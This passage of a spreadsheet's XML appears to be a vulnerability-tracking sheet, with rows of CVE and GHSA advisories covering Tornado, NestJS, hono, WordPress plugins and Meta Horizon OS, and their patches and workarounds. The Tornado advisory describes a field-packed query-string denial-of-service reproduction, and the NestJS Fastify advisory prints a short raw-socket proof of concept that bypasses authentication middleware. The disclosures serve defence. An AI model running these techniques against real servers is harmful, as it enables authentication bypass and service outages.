### Patches
Upgrade to `fastify` `5.12.5` or later.
### Workarounds
Avoid registering response trailers with `reply.trailer()` on routes served over HTTP/2 until upgrading.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92081</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92172</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>Prior to v66.0.0.733.524 of Meta Horizon OS, OVRMediaService could be induced to send a privileged PendingIntent including a com.oculus.horizon CallerIdentity to an arbitrary application registering for com.oculus.systemactivities.SCREENSHOT via a broadcast receiver. That would allow the application to impersonate the com.oculus.horizon package towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92172</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92173</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>Prior to v74.0.0.878.1682 of Meta Horizon OS, MediaSyncJobReceiver could be induced to send a privileged PendingIntent including a com.oculus.vrshell CallerIdentity to an arbitrary application listening via NotificationListenerService. That would allow the application to impersonate the com.oculus.vrshell package, as well as packages signed with the same key, towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92173</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92412</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>The Five Star Restaurant Reviews WordPress plugin before 2.3.14 does not properly escape a user-supplied value before outputting it into an HTML tag, allowing unauthenticated attackers to inject arbitrary web script that runs in the browser of anyone tricked into submitting a crafted request, including a logged-in administrator.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92412</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93981</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr">
        <is>
          <t>npm:hono</t>
        </is>
      </c>
      <c r="M653" s="5" t="inlineStr">
        <is>
          <t>4.13.7</t>
        </is>
      </c>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>### Summary
`hono/jsx` does not HTML-escape a plain string placed directly as a child or `fallback` of `Suspense` or `ErrorBoundary`, as the only child of a `Context.Provider`, or as the root value of `renderToString()` / `renderToReadableStream()` from `hono/jsx/dom/server`. Such a string is emitted as markup instead of text.
### Details
These paths stringify their input and treat the result as already-escaped HTML, so a plain string passes through unchanged. Notable cases:
- `Suspense`: a string child, or a string `fallback` while a child suspends. With streaming, the fallback reaches the browser in the initial chunk.
- `ErrorBoundary`: a string child alongside an asynchronous sibling. The all-synchronous case was fixed in 4.11.7 (GHSA-9r54-q6cx-xmh5).
- `Context.Provider`: a single string child. Multiple children are escaped.
- `hono/jsx/dom/server`: a string, or an array containing strings, passed as the root.
A lone `{children}` forwarded by a wrapper component is enough to reach these paths. Strings wrapped in an element, values from `raw()` or the `html` helper, and client-side rendering with `hono/jsx/dom` are not affected.
### Impact
An attacker who controls a string rendered in an affected position can inject arbitrary HTML into the server-rendered page, leading to cross-site scripting under the application's origin.
This issue affects applications that render untrusted strings directly in one of the positions above during server-side rendering.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93981</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96173</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that the requester is authorized to view an order before redirecting a public payment-callback request, allowing unauthenticated attackers to obtain the order key of an arbitrary order and view its contents.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96173</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96200</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that payment notifications received by its payment callback come from the payment provider, allowing unauthenticated attackers to mark arbitrary orders as paid without payment.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96200</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96255</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not prevent public access to a debug log in which it records payment requests, including the store's payment gateway API credentials in plain text, allowing unauthenticated attackers to obtain those credentials.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96255</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M657" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>## Summary
`HTTPServerRequest.__init__` in `tornado/httputil.py` parses the URL query string via
`parse_qs_bytes()` with no field-count limit — while the sibling POST-body parsing path
(`parse_body_arguments`) received a `max_num_fields=1000` cap added earlier in this exact
same release (v6.5.8, commit `8d6363ed`), explicitly to bound parsing cost for the identical
underlying primitive. This leaves the query-string path with the resource-exhaustion exposure
the body-path fix was meant to close.
**File**: `tornado/httputil.py`, line 553 (`HTTPServerRequest.__init__`)
### Root Cause
```python
# tornado/httputil.py:553 (before fix)
self.arguments = parse_qs_bytes(self.query, keep_blank_values=True)
```
Compare with the POST-body path fixed one commit earlier in the same release:
```python
# tornado/httputil.py:1038-1041
uri_arguments = parse_qs_bytes(
    body,
    keep_blank_values=True,
    max_num_fields=config.urlencoded.max_arguments,  # default 1000
)
```
Both call sites funnel through the same `tornado.escape.parse_qs_bytes` (a thin wrapper over
`urllib.parse.parse_qs`), which is exactly why `max_num_fields` was added to
`urllib.parse.parse_qsl` upstream — to let frameworks bound field count. The fix was applied
only to the body path; the query-string path was missed.
The request line + headers together are capped at `max_header_size` (default 65536 bytes), so
this is not literally unbounded, but a single ~64KB request line can carry thousands of short
`key=value` pairs — far beyond the 1000-field limit the maintainer judged appropriate for the
structurally identical body case.
### Attack Scenario
1. Attacker sends a `GET` request whose query string is packed with thousands of short fields
   (e.g. `k0=1&amp;k1=1&amp;...&amp;k7799=1`, ~61KB), fitting comfortably under `max_header_size`. No
   authentication, cookies, or prior state required.
2. Tornado accepts and parses this with no field-count cap, unlike the equivalent POST-body
   request (which is correctly rejected with 400 once &gt;1000 fields are present).
3. Parsing thousands of fields is CPU work performed synchronously inside Tornado's
   single-threaded `IOLoop`. Several such requests in flight concurrently stall the event
   loop, delaying processing of *all* other connections on that loop — not just the
   attacker's own request.
### Verification (dynamic, local reproduction against v6.5.8)
Ran the unmodified v6.5.8 source directly (no external dependencies needed) with a minimal
`tornado.web.Application` on `127.0.0.1:8888`.
- Identical 7800-field/~61KB payload sent as GET query string → `200 OK`; sent as POST body
  (`application/x-www-form-urlencoded`) → `400 Bad Request` (correctly rejected by the
  existing `max_num_fields` body-path limit). This confirms the asymmetry directly.
- Per-request parse cost: baseline (`/?a=1`) averaged 1.86ms; the 7800-field query string
  averaged 25.1ms (~13x).
- Event-loop-blocking amplification (raw-socket test, isolating server-side stall from
  client overhead): with 10 sequential baseline probe requests fired with no load, average
  latency was 1.47ms (max 5.9ms). With 5 concurrent 61KB/7800-field requests in flight,
  the same baseline probes averaged 13.0ms (max 118.1ms) — an **8.9x average slowdown** for
  unrelated clients, produced by ~305KB of unauthenticated attacker traffic.
### Impact
All Tornado servers/applications are affected — this triggers on every request with a query
string, independent of application/handler logic. An unauthenticated, unprivileged remote
attacker can measurably degrade response times for all other clients sharing the same
`IOLoop`, using a small amount of bandwidth and no special conditions. This is an
availability/DoS concern; no confidentiality or integrity impact.
### Recommended Fix
```python
# tornado/httputil.py — HTTPServerRequest.__init__
if uri is not None:
    self.path, sep, self.query = uri.partition("?")
try:
    self.arguments = parse_qs_bytes(
        self.query,
        keep_blank_values=True,
        max_num_fields=_DEFAULT_PARSE_BODY_CONFIG.urlencoded.max_arguments,
    )
except ValueError as e:
    raise HTTPInputError("Invalid query string: %s" % e) from e
```
This reuses the existing `ParseUrlEncodedConfig.max_arguments` default (1000) via the
module's `_DEFAULT_PARSE_BODY_CONFIG`, matching the POST-body limit and honoring any global
override via `set_parse_body_config()`. The `try/except` is necessary because — unlike
`parse_body_arguments`, which already wraps its call and converts `ValueError` into a clean
`HTTPInputError`/400 — the query-string call site currently has no such handling, so without
it, a request exceeding the limit would raise an uncaught `ValueError` instead of a clean 400.
Verified: with the fix applied, requests with ≤1000 query-string fields are unaffected;
requests with &gt;1000 fields are rejected with `400 Bad Request` (consistent with the POST-body
behavior); Tornado's own `httputil_test` and `web_test` suites (256 tests) pass unchanged.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/microservices</t>
        </is>
      </c>
      <c r="M658" s="5" t="inlineStr">
        <is>
          <t>11.2.5, 12.0.3</t>
        </is>
      </c>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>## Summary
A peer that can open a TCP connection to a NestJS microservice using the built-in TCP
transport can make the server process allocate memory without limit, on either side of the
connection, until the process is killed by the OS or by its container memory limit. No
authentication, no credentials, and no valid message are required.
Applications are affected only if they start a microservice with `Transport.TCP` and the
transport's port is reachable by an untrusted peer.
## Affected versions
| Package | Affected | Patched |
|---|---|---|
| `@nestjs/microservices` | `&gt;= 12.0.0, &lt; 12.0.3` | **12.0.3** |
| `@nestjs/microservices` | `&lt; 11.2.5` | **11.2.5** |
The same code is present in the 10.x line and earlier. Those lines are end-of-life and
will not receive a patch; upgrade to a supported major.
Only `@nestjs/microservices` is affected. No other package needs updating for this issue.
## Details
Two independent paths let one peer grow the heap without bound.
### Partial packets are buffered with nothing to reap them
The TCP transport frames messages as `&lt;length&gt;#&lt;payload&gt;`. A peer may declare a length,
send part of the payload, and then stop. `JsonSocket` keeps the partial payload buffered
while it waits for the rest, and nothing ever reclaimed it: there was no socket timeout, no
cap on the number of connections, and no tracking of accepted sockets.
`maxBufferSize` did not close this. It caps a single connection, defaulting to 128M
characters, and is enforced per connection, so the effective ceiling was the number of
connections an attacker chose to open.
Ten connections that each send 20MB and then go silent:
| | rss | heapUsed |
|---|---|---|
| baseline | 152.3MB | 28.1MB |
| after 200MB sent, all stalled | 561.2MB | 229.5MB |
The memory was held for as long as the connections stayed open. Closing them released it,
so a peer could hold it indefinitely at negligible cost to itself.
### Response backpressure was ignored
`JsonSocket#handleSend` discarded the return value of `socket.write`. A peer that issues
requests and never reads the responses therefore made the process queue every response in
memory, with no ceiling and no signal to stop producing more.
Thirty requests from a client whose stream is paused, against a handler returning an 8MB
payload, grew rss from 152.4MB to 419.1MB. The amplification here is roughly 1:1, because
the response size is set by the application rather than by the attacker; the defect is that
the server buffers all of it rather than applying backpressure or giving up.
## Impact
An unauthenticated peer that can reach the transport's port can drive the process to an
out-of-memory kill. Under a container memory limit this is fast and repeatable, and it
restarts the pod rather than merely degrading it.
There is no confidentiality or integrity impact. Nothing is read, written, or executed;
the failure mode is availability only.
Applications are not affected if the TCP transport is not used, or if the transport's port
is reachable only by trusted peers.
## Patches
Upgrade `@nestjs/microservices` to **12.0.3** or **11.2.5**.
Three changes landed together:
- **A stall timer drops a peer that stops sending mid-packet.** It is armed only while a
  packet is partially received and is refreshed on every read, so a slow but progressing
  transfer is never interrupted and a peer sitting idle between packets is left alone.
  Configurable as `incompleteMessageTimeout`, default 30000ms.
- **Reading is suspended while a peer's outgoing buffer is backed up** and resumes on
  `drain`, so a peer that stops reading cannot keep issuing requests.
- **Responses queued for a peer that reads nothing are capped.** Suspending reads is not
  sufficient on its own, because message handlers are asynchronous: a burst of pipelined
  requests is dispatched before the first response is written, and those responses still
  queue. Configurable as `maxSendBufferSize`, default 128MB.
Both limits are configurable on the server and on the client, and either can be disabled by
setting it to `0`.
### Behaviour change
Both limits are enabled by default, following the precedent set by `maxBufferSize`. A peer
that stops sending mid-packet for 30 seconds, or that lets more than 128MB of responses
queue unread on a single connection, is now disconnected where previously it was not.
The send cap can also drop a peer that is genuinely reading, if responses are produced
faster than the socket drains for long enough. The default is set high for that reason.
Applications that stream very large responses to deliberately slow consumers should raise
`maxSendBufferSize` or set it to `0`.
## Workarounds
For anyone who cannot upgrade immediately:
- **Restrict who can reach the port.** The TCP transport is designed for trusted
  service-to-service traffic. A network policy, security group, or L4 firewall that limits
  the port to known peers removes the exposure entirely, and is worth doing regardless of
  version.
- **Lower `maxBufferSize`.** This reduces what a single connection can pin on the receive
  side. It does not bound the total, because the limit is per connection and the number of
  connections is not capped, and it does nothing for the response-queueing path.
- **Supply a custom `socketClass`.** An application-provided socket class can implement its
  own idle timeout and backpressure handling. This is the only pre-patch mitigation that
  addresses the sending side.
Setting a process memory limit does not mitigate this. It converts the failure from an
out-of-memory kill of the host into an out-of-memory kill of the process.
## Credit
Reported by Salman Aljardan, who provided a detailed write-up and self-contained proofs of
concept for each issue, and coordinated disclosure.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/platform-fastify</t>
        </is>
      </c>
      <c r="M659" s="5" t="inlineStr">
        <is>
          <t>11.2.4, 12.0.2</t>
        </is>
      </c>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>| Field | Value |
| --- | --- |
| Ecosystem | npm |
| Package | `@nestjs/platform-fastify` |
| Affected versions | `&gt;= 12.0.0, &lt; 12.0.2` and `&lt; 11.2.4` |
| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |
### Summary
On the Fastify adapter, an HTTP request that uses an **absolute-form request target** (`GET http://host/path HTTP/1.1`
instead of `GET /path HTTP/1.1`) reaches the route handler without running the path-scoped Nest middleware bound to
that route. Applications that enforce authentication or authorization in middleware execute the protected handler
with those checks skipped.
### Impact
Any application that
- uses `@nestjs/platform-fastify`, and
- binds middleware to specific paths via `MiddlewareConsumer.forRoutes(...)` or `.exclude(...)`, and
- is reachable by a client that controls the raw request line.
Node's HTTP server accepts absolute-form targets, so no special server configuration is needed. Exposure is reduced
when a reverse proxy in front of the application rewrites the request target to origin-form, which most do.
Where the bypassed middleware performs authentication or authorization, the result is an authentication or
authorization bypass. Where it performs logging, rate limiting or body handling, those are silently skipped instead.
### Details
Fastify's router (`find-my-way`) resolves an absolute-form target to its path before matching, so the route handler
is dispatched normally. Two places on the middleware side matched against the **raw** request target instead:
1. The bundled copy of the `@fastify/middie` engine at `packages/platform-fastify/adapters/middie/fastify-middie.ts`.
   NestJS carried this fork to apply an earlier path-decoding fix and it did not track the upstream absolute-form fix
   released in `@fastify/middie@9.3.4`.
2. `FastifyAdapter`'s own re-check in `createMiddlewareFactory()`, which tests the middleware path regexp against
   `req.originalUrl`.
Both normalized and percent-decoded the target, but neither resolved absolute-form to a path, so the router and the
middleware layer disagreed about which path was being requested.
A second, related defect contributed. Because the adapter always passes `routerOptions` (to install the version
constraint), Fastify did not reflect the deprecated **top-level** router options (`ignoreTrailingSlash`,
`ignoreDuplicateSlashes`, `caseSensitive`, `useSemicolonDelimiter`) in `initialConfig.routerOptions`, which is what
the middleware engine reads. Applications passing those options at the top level had middleware normalize paths
differently from the router, which widened the mismatch.
### Proof of concept
```ts
@Controller('users')
export class UsersController {
  @Get()
  findAll() {
    return 'protected data';
  }
}
@Module({ controllers: [UsersController] })
export class AppModule implements NestModule {
  configure(consumer: MiddlewareConsumer) {
    consumer
      .apply((req, res) =&gt; res.end('blocked by auth middleware'))
      .forRoutes({ path: 'users', method: RequestMethod.GET });
  }
}
```
`supertest` and `light-my-request` always emit origin-form targets, so the request has to be written to the socket:
```js
const { connect } = require('node:net');
const socket = connect(3000, '127.0.0.1', () =&gt; {
  socket.write(
    'GET http://127.0.0.1:3000/users HTTP/1.1\r\n' +
      'Host: 127.0.0.1:3000\r\n' +
      'Connection: close\r\n\r\n',
  );
});
socket.pipe(process.stdout);
```
Observed on an affected version: `protected data` — the middleware did not run.
Expected, and observed on a patched version: `blocked by auth middleware`.
### Patches
Fixed in **12.0.2** and **11.2.4**. Upgrading to **12.0.3** or **11.2.5** is recommended.
- The bundled `@fastify/middie` fork was removed and the package now depends on `@fastify/middie@9.3.4`, which
  resolves absolute-form targets before matching.
- The adapter resolves absolute-form targets in its own route check, mirroring `find-my-way`.
- Deprecated top-level Fastify router options are folded into `routerOptions` so the middleware engine and the
  router normalize paths identically.
### Workarounds
If you cannot upgrade, reject non-origin-form request targets before middleware runs. Register the hook on the
Fastify instance **before the application is initialized**, so that it runs ahead of the middleware engine's own
`onRequest` hook, and confirm with the request above that the rejection takes effect:
```ts
const adapter = new FastifyAdapter();
adapter.getInstance().addHook('onRequest', (request, reply, done) =&gt; {
  const target = request.raw.url ?? '';
  // "*" is the legitimate request target of "OPTIONS * HTTP/1.1"
  if (target[0] !== '/' &amp;&amp; target !== '*') {
    reply.code(400).send();
    return;
  }
  done();
});
```
Rejecting or normalizing absolute-form targets at a reverse proxy in front of the application is equally effective.
### Credit
Reported by ZeroVuln Labs.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
